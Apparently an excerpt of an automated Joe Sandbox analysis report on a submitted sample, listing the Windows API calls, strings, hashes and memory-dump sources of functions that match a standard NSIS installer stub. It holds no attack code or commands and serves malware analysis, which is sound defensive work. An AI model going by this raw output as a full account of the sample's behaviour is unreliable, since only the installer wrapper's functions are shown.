                                              • Opcode ID: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                              • Instruction ID: 8a3521d6a9ab1c5b5eb45e3d7957e6eefdd785676f1866d9874d60d9aff9e69c
                                              • Opcode Fuzzy Hash: 35cbb8abcdf375330cdaaed117d7ae66e2d52f36901990e867650d9b3411c4d0
                                              • Instruction Fuzzy Hash: 1CF16770D04229CBDF18CFA8C8946ADBBB0FF45305F25816ED856BB281D7386A86DF45
                                              APIs
                                              • FindFirstFileW.KERNEL32(00437800,00426778,00425F30,00405E0E,00425F30,00425F30,00000000,00425F30,00425F30,00437800,?,771B2EE0,00405B1A,?,00437800,771B2EE0), ref: 00406736
                                              • FindClose.KERNEL32(00000000), ref: 00406742
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: Find$CloseFileFirst
                                              • String ID: xgB
                                              • API String ID: 2295610775-399326502
                                              • Opcode ID: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                              • Instruction ID: 964bfaba6fe47efa91ae3b9d04416f3a0311ddb8c2b0a677c8b566ff70b98767
                                              • Opcode Fuzzy Hash: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                              • Instruction Fuzzy Hash: 08D012315150205BC2011738BD4C85B7A589F553357228B37B866F61E0C7348C62869C
                                              APIs
                                              • GetDlgItem.USER32(?,00000403), ref: 004055ED
                                              • GetDlgItem.USER32(?,000003EE), ref: 004055FC
                                              • GetClientRect.USER32(?,?), ref: 00405639
                                              • GetSystemMetrics.USER32(00000002), ref: 00405640
                                              • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405661
                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405672
                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405685
                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405693
                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 004056A6
                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 004056C8
                                              • ShowWindow.USER32(?,?), ref: 004056DC
                                              • GetDlgItem.USER32(?,?), ref: 004056FD
                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 0040570D
                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405726
                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405732
                                              • GetDlgItem.USER32(?,?), ref: 0040560B
                                                • Part of subcall function 00404394: SendMessageW.USER32(?,?,00000001,004041BF), ref: 004043A2
                                              • GetDlgItem.USER32(?,?), ref: 0040574F
                                              • CreateThread.KERNEL32(00000000,00000000,Function_00005523,00000000), ref: 0040575D
                                              • CloseHandle.KERNEL32(00000000), ref: 00405764
                                              • ShowWindow.USER32(00000000), ref: 00405788
                                              • ShowWindow.USER32(?,?), ref: 0040578D
                                              • ShowWindow.USER32(?), ref: 004057D7
                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040580B
                                              • CreatePopupMenu.USER32 ref: 0040581C
                                              • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405830
                                              • GetWindowRect.USER32(?,?), ref: 00405850
                                              • TrackPopupMenu.USER32(00000000,?,?,?,00000000,?,00000000), ref: 00405869
                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058A1
                                              • OpenClipboard.USER32(00000000), ref: 004058B1
                                              • EmptyClipboard.USER32 ref: 004058B7
                                              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 004058C3
                                              • GlobalLock.KERNEL32(00000000), ref: 004058CD
                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 004058E1
                                              • GlobalUnlock.KERNEL32(00000000), ref: 00405901
                                              • SetClipboardData.USER32(0000000D,00000000), ref: 0040590C
                                              • CloseClipboard.USER32 ref: 00405912
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                              • String ID: (7B${
                                              • API String ID: 590372296-525222780
                                              • Opcode ID: f04ab8e6c053f28f703b7489d19dc379b83f29f3476edfbeb8782164aeb73afa
                                              • Instruction ID: ef9837d71be30d97cad1ad5ee6bf48d4101bac37d77d0ad6e239d9f51a57dc01
                                              • Opcode Fuzzy Hash: f04ab8e6c053f28f703b7489d19dc379b83f29f3476edfbeb8782164aeb73afa
                                              • Instruction Fuzzy Hash: C4B16A70900608FFDB11AFA0DD85AAE7B79FB48355F00403AFA45B61A0CB754E52DF68
                                              APIs
                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403EC2
                                              • ShowWindow.USER32(?), ref: 00403EDF
                                              • DestroyWindow.USER32 ref: 00403EF3
                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403F0F
                                              • GetDlgItem.USER32(?,?), ref: 00403F30
                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403F44
                                              • IsWindowEnabled.USER32(00000000), ref: 00403F4B
                                              • GetDlgItem.USER32(?,00000001), ref: 00403FF9
                                              • GetDlgItem.USER32(?,00000002), ref: 00404003
                                              • SetClassLongW.USER32(?,000000F2,?), ref: 0040401D
                                              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 0040406E
                                              • GetDlgItem.USER32(?,00000003), ref: 00404114
                                              • ShowWindow.USER32(00000000,?), ref: 00404135
                                              • EnableWindow.USER32(?,?), ref: 00404147
                                              • EnableWindow.USER32(?,?), ref: 00404162
                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00404178
                                              • EnableMenuItem.USER32(00000000), ref: 0040417F
                                              • SendMessageW.USER32(?,?,00000000,00000001), ref: 00404197
                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 004041AA
                                              • lstrlenW.KERNEL32(00423728,?,00423728,00000000), ref: 004041D4
                                              • SetWindowTextW.USER32(?,00423728), ref: 004041E8
                                              • ShowWindow.USER32(?,0000000A), ref: 0040431C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                              • String ID: (7B
                                              • API String ID: 184305955-3251261122
                                              • Opcode ID: 030bf1c90a5d59ce14a62ff8eb631d2412c8a49503263f6ef8a14511ced3c4f7
                                              • Instruction ID: 1e1a27d6975204c591228116fe5edee23a209105d2649c04e919f1d7e5095d09
                                              • Opcode Fuzzy Hash: 030bf1c90a5d59ce14a62ff8eb631d2412c8a49503263f6ef8a14511ced3c4f7
                                              • Instruction Fuzzy Hash: 6FC1A2B1644200FBDB216F61EE85D2A3BB8EB94706F40053EFA41B11F1CB7958529B6D
                                              APIs
                                                • Part of subcall function 004067C2: GetModuleHandleA.KERNEL32(?,?,?,00403517,0000000A), ref: 004067D4
                                                • Part of subcall function 004067C2: GetProcAddress.KERNEL32(00000000,?), ref: 004067EF
                                              • lstrcatW.KERNEL32(00437000,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,00437800,771B3420,00435000,00000000), ref: 00403B59
                                              • lstrlenW.KERNEL32(004281E0,?,?,?,004281E0,00000000,00435800,00437000,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,00437800), ref: 00403BD9
                                              • lstrcmpiW.KERNEL32(004281D8,.exe,004281E0,?,?,?,004281E0,00000000,00435800,00437000,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403BEC
                                              • GetFileAttributesW.KERNEL32(004281E0), ref: 00403BF7
                                              • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,00435800), ref: 00403C40
                                                • Part of subcall function 0040632F: wsprintfW.USER32 ref: 0040633C
                                              • RegisterClassW.USER32(004291E0), ref: 00403C7D
                                              • SystemParametersInfoW.USER32(?,00000000,?,00000000), ref: 00403C95
                                              • CreateWindowExW.USER32(?,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CCA
                                              • ShowWindow.USER32(00000005,00000000), ref: 00403D00
                                              • GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403D2C
                                              • GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403D39
                                              • RegisterClassW.USER32(004291E0), ref: 00403D42
                                              • DialogBoxParamW.USER32(?,00000000,00403E86,00000000), ref: 00403D61
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                              • String ID: (7B$.DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                              • API String ID: 1975747703-1425696872
                                              • Opcode ID: fa642e9f5f159fa40c6df89367760cd7b58c30057714375835671963a1e6ccc9
                                              • Instruction ID: f49b718e50d7a26840138b6048ee10d29e8519d5aa43f5d66e73d4226ad9b376
                                              • Opcode Fuzzy Hash: fa642e9f5f159fa40c6df89367760cd7b58c30057714375835671963a1e6ccc9
                                              • Instruction Fuzzy Hash: FF61C470204700BBE220AF669E45F2B3A7CEB84B49F40447FF945B22E2DB7D5912C62D
                                              APIs
                                              • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 004045BC
                                              • GetDlgItem.USER32(?,?), ref: 004045D0
                                              • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 004045ED
                                              • GetSysColor.USER32(?), ref: 004045FE
                                              • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 0040460C
                                              • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040461A
                                              • lstrlenW.KERNEL32(?), ref: 0040461F
                                              • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 0040462C
                                              • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 00404641
                                              • GetDlgItem.USER32(?,0000040A), ref: 0040469A
                                              • SendMessageW.USER32(00000000), ref: 004046A1
                                              • GetDlgItem.USER32(?,?), ref: 004046CC
                                              • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040470F
                                              • LoadCursorW.USER32(00000000,00007F02), ref: 0040471D
                                              • SetCursor.USER32(00000000), ref: 00404720
                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00404739
                                              • SetCursor.USER32(00000000), ref: 0040473C
                                              • SendMessageW.USER32(00000111,00000001,00000000), ref: 0040476B
                                              • SendMessageW.USER32(?,00000000,00000000), ref: 0040477D
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
                                              • String ID: N
                                              • API String ID: 3103080414-1130791706
                                              • Opcode ID: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                              • Instruction ID: 26ae409e5f73424340e4bb55f347a499eb46e427c8d4328441e026d38e95c6c2
                                              • Opcode Fuzzy Hash: c2d943e7d3074a80d89972f065d7b0d6c6867904808fb573d17a53c74c23d30b
                                              • Instruction Fuzzy Hash: 4B6173B1900209BFDB109F60DD85EAA7B69FB84314F00853AFB05772E0D7789D52CB58
                                              APIs
                                              • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
                                              • BeginPaint.USER32(?,?), ref: 00401047
                                              • GetClientRect.USER32(?,?), ref: 0040105B
                                              • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                              • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                              • DeleteObject.GDI32(?), ref: 004010ED
                                              • CreateFontIndirectW.GDI32(?), ref: 00401105
                                              • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                              • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                              • SelectObject.GDI32(00000000,?), ref: 00401140
                                              • DrawTextW.USER32(00000000,00429240,000000FF,00000010,00000820), ref: 00401156
                                              • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                              • DeleteObject.GDI32(?), ref: 00401165
                                              • EndPaint.USER32(?,?), ref: 0040116E
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                              • String ID: F
                                              • API String ID: 941294808-1304234792
                                              • Opcode ID: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                              • Instruction ID: b35030fe9107d9a8359b932f7918d2348922827c9ca57aaae851fe5b21190c6b
                                              • Opcode Fuzzy Hash: a62f14d8607f0cab4b909ce482175ba86ddefa50def87cd09a38214d4056f576
                                              • Instruction Fuzzy Hash: 92418A71800249AFCF058FA5DE459AFBBB9FF44310F00842AF991AA1A0C738E955DFA4
                                              APIs
                                              • GetDlgItem.USER32(?,000003FB), ref: 0040489F
                                              • SetWindowTextW.USER32(00000000,?), ref: 004048C9
                                              • SHBrowseForFolderW.SHELL32(?), ref: 0040497A
                                              • CoTaskMemFree.OLE32(00000000), ref: 00404985
                                              • lstrcmpiW.KERNEL32(004281E0,00423728,00000000,?,?), ref: 004049B7
                                              • lstrcatW.KERNEL32(?,004281E0), ref: 004049C3
                                              • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004049D5
                                                • Part of subcall function 00405A32: GetDlgItemTextW.USER32(?,?,?,00404A0C), ref: 00405A45
                                                • Part of subcall function 0040667C: CharNextW.USER32(?,*?|<>/":,00000000,00000000,00437800,00437800,00435000,00403480,00437800,771B3420,004036EF,?,00000006,?,0000000A), ref: 004066DF
                                                • Part of subcall function 0040667C: CharNextW.USER32(?,?,?,00000000,?,00000006,?,0000000A), ref: 004066EE
                                                • Part of subcall function 0040667C: CharNextW.USER32(?,00000000,00437800,00437800,00435000,00403480,00437800,771B3420,004036EF,?,00000006,?,0000000A), ref: 004066F3
                                                • Part of subcall function 0040667C: CharPrevW.USER32(?,?,00437800,00437800,00435000,00403480,00437800,771B3420,004036EF,?,00000006,?,0000000A), ref: 00406706
                                              • GetDiskFreeSpaceW.KERNEL32(004216F8,?,?,0000040F,?,004216F8,004216F8,?,00000001,004216F8,?,?,000003FB,?), ref: 00404A98
                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404AB3
                                                • Part of subcall function 00404C0C: lstrlenW.KERNEL32(00423728,00423728,?,%u.%u%s%s,00000005,00000000,00000000,?,?,00000000,?,000000DF,00000000,00000400,?), ref: 00404CAD
                                                • Part of subcall function 00404C0C: wsprintfW.USER32 ref: 00404CB6
                                                • Part of subcall function 00404C0C: SetDlgItemTextW.USER32(?,00423728), ref: 00404CC9
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                              • String ID: (7B$A
                                              • API String ID: 2624150263-3645020878
                                              • Opcode ID: e24882e00550f6ead3a1036a7d6e943431ff60c63dfc37ca84bce6dbb49f36c9
                                              • Instruction ID: 217fbe9c53fcac7a38d38ba6b36a95d3c52d9e466bb1b0d29fe77156d884dce9
                                              • Opcode Fuzzy Hash: e24882e00550f6ead3a1036a7d6e943431ff60c63dfc37ca84bce6dbb49f36c9
                                              • Instruction Fuzzy Hash: 01A161F1A00205ABDB11EFA5C985AAF77B8EF84315F10803BF611B62D1D77C9A418B6D
                                              APIs
                                              • CloseHandle.KERNEL32(00000000,?,00000000,00000001,?,00000000,?,?,004061CF,?,?), ref: 0040606F
                                              • GetShortPathNameW.KERNEL32(?,00426DC8,00000400), ref: 00406078
                                                • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E53
                                                • Part of subcall function 00405E43: lstrlenA.KERNEL32(00000000,?,00000000,00406128,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405E85
                                              • GetShortPathNameW.KERNEL32(?,004275C8,00000400), ref: 00406095
                                              • wsprintfA.USER32 ref: 004060B3
                                              • GetFileSize.KERNEL32(00000000,00000000,004275C8,C0000000,?,004275C8,?,?,?,?,?), ref: 004060EE
                                              • GlobalAlloc.KERNEL32(?,0000000A,?,?,?,?), ref: 004060FD
                                              • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406135
                                              • SetFilePointer.KERNEL32(0040A590,00000000,00000000,00000000,00000000,004269C8,00000000,-0000000A,0040A590,00000000,[Rename],00000000,00000000,00000000), ref: 0040618B
                                              • GlobalFree.KERNEL32(00000000), ref: 0040619C
                                              • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 004061A3
                                                • Part of subcall function 00405EDE: GetFileAttributesW.KERNEL32(00000003,00402F73,00438800,80000000,00000003), ref: 00405EE2
                                                • Part of subcall function 00405EDE: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
                                              • String ID: %ls=%ls$[Rename]
                                              • API String ID: 2171350718-461813615
                                              • Opcode ID: 743beb3988d04f7b57c6902fe00ffd967832125f1abdce8c9c4456724f210b8f
                                              • Instruction ID: 8c4bc4cab4d3408e43c29de3b383fd3cef376d344e04ab2aaf2f470794b42cbb
                                              • Opcode Fuzzy Hash: 743beb3988d04f7b57c6902fe00ffd967832125f1abdce8c9c4456724f210b8f
                                              • Instruction Fuzzy Hash: 34313770200719BFD2206B619D48F6B3A6CEF45704F16043EFA46FA2D3DA3C99158ABD
                                              APIs
                                              • GetTickCount.KERNEL32 ref: 00402F44
                                              • GetModuleFileNameW.KERNEL32(00000000,00438800,?), ref: 00402F60
                                                • Part of subcall function 00405EDE: GetFileAttributesW.KERNEL32(00000003,00402F73,00438800,80000000,00000003), ref: 00405EE2
                                                • Part of subcall function 00405EDE: CreateFileW.KERNEL32(?,?,00000001,00000000,?,00000001,00000000), ref: 00405F04
                                              • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,00436800,00436800,00438800,00438800,80000000,00000003), ref: 00402FA9
                                              • GlobalAlloc.KERNEL32(?,0040A230), ref: 004030F0
                                              Strings
                                              • Error launching installer, xrefs: 00402F80
                                              • soft, xrefs: 00403020
                                              • Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403139
                                              • Inst, xrefs: 00403017
                                              • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 00403187
                                              • Null, xrefs: 00403029
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                              • String ID: Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                              • API String ID: 2803837635-787788815
                                              • Opcode ID: da7d1d4a2d7cfe0a4d95b8b78dbffc0a58d971e607472f26681b65440013a3aa
                                              • Instruction ID: fab51a6d61a7302470dd91ad27108f0c0be819ae48098b15a947b51e22d3bd00
                                              • Opcode Fuzzy Hash: da7d1d4a2d7cfe0a4d95b8b78dbffc0a58d971e607472f26681b65440013a3aa
                                              • Instruction Fuzzy Hash: 4961D271A00205ABDB20DFA4DD45A9A7BA8EB04356F20413FF904F62D1DB7C9A458BAD
                                              APIs
                                              • GetSystemDirectoryW.KERNEL32(004281E0,?), ref: 0040654B
                                              • GetWindowsDirectoryW.KERNEL32(004281E0,?,00000000,00422708,?,00405487,00422708,00000000), ref: 0040655E
                                              • SHGetSpecialFolderLocation.SHELL32(00405487,00000000,00000000,00422708,?,00405487,00422708,00000000), ref: 0040659A
                                              • SHGetPathFromIDListW.SHELL32(00000000,004281E0), ref: 004065A8
                                              • CoTaskMemFree.OLE32(00000000), ref: 004065B3
                                              • lstrcatW.KERNEL32(004281E0,\Microsoft\Internet Explorer\Quick Launch), ref: 004065D9
                                              • lstrlenW.KERNEL32(004281E0,00000000,00422708,?,00405487,00422708,00000000), ref: 00406631
                                              Strings
                                              • Software\Microsoft\Windows\CurrentVersion, xrefs: 0040651B
                                              • \Microsoft\Internet Explorer\Quick Launch, xrefs: 004065D3
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                              • String ID: Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                              • API String ID: 717251189-730719616
                                              • Opcode ID: fadb749951e57590abd2d4ee5972ead553d40ab2c5c4ce1725a089f13c923e34
                                              • Instruction ID: bd17f2555f8fb0ecb5cfb39a154c1e2018f2892b34e65fa403921cbdc39efe9b
                                              • Opcode Fuzzy Hash: fadb749951e57590abd2d4ee5972ead553d40ab2c5c4ce1725a089f13c923e34
                                              • Instruction Fuzzy Hash: A4612371A00115ABDF209F64DD41AAE37A5AF50314F62813FE903B72D0E73E9AA2C75D
                                              APIs
                                              • GetWindowLongW.USER32(?,000000EB), ref: 004043E3
                                              • GetSysColor.USER32(00000000), ref: 00404421
                                              • SetTextColor.GDI32(?,00000000), ref: 0040442D
                                              • SetBkMode.GDI32(?,?), ref: 00404439
                                              • GetSysColor.USER32(?), ref: 0040444C
                                              • SetBkColor.GDI32(?,?), ref: 0040445C
                                              • DeleteObject.GDI32(?), ref: 00404476
                                              • CreateBrushIndirect.GDI32(?), ref: 00404480
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.3692697529.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000008.00000002.3692528651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692847494.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692892416.000000000040A000.00000008.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000008.00000002.3692965450.0000000000452000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_400000_KO0q4biYfC.jbxd
                                              Similarity
                                              • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                              • String ID:
                                              • API String ID: 2320649405-0
                                              • Opcode ID: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                              • Instruction ID: 4d8d1a64c5805e8a020b3744e793f2033a9a6b6b0a681029562fed9dd316a9da
                                              • Opcode Fuzzy Hash: cedac81959eb3ef19a74f908d68e4e703a61b794166ebd5b231b869c6a402091
                                              • Instruction Fuzzy Hash: 722131715007049BCB319F68D948B5BBBF8AF81714B148A2EEE96E26E0D738D944CB54
                                              APIs
                                              • ReadFile.KERNEL32(?,?,?,?), ref: 004026B6
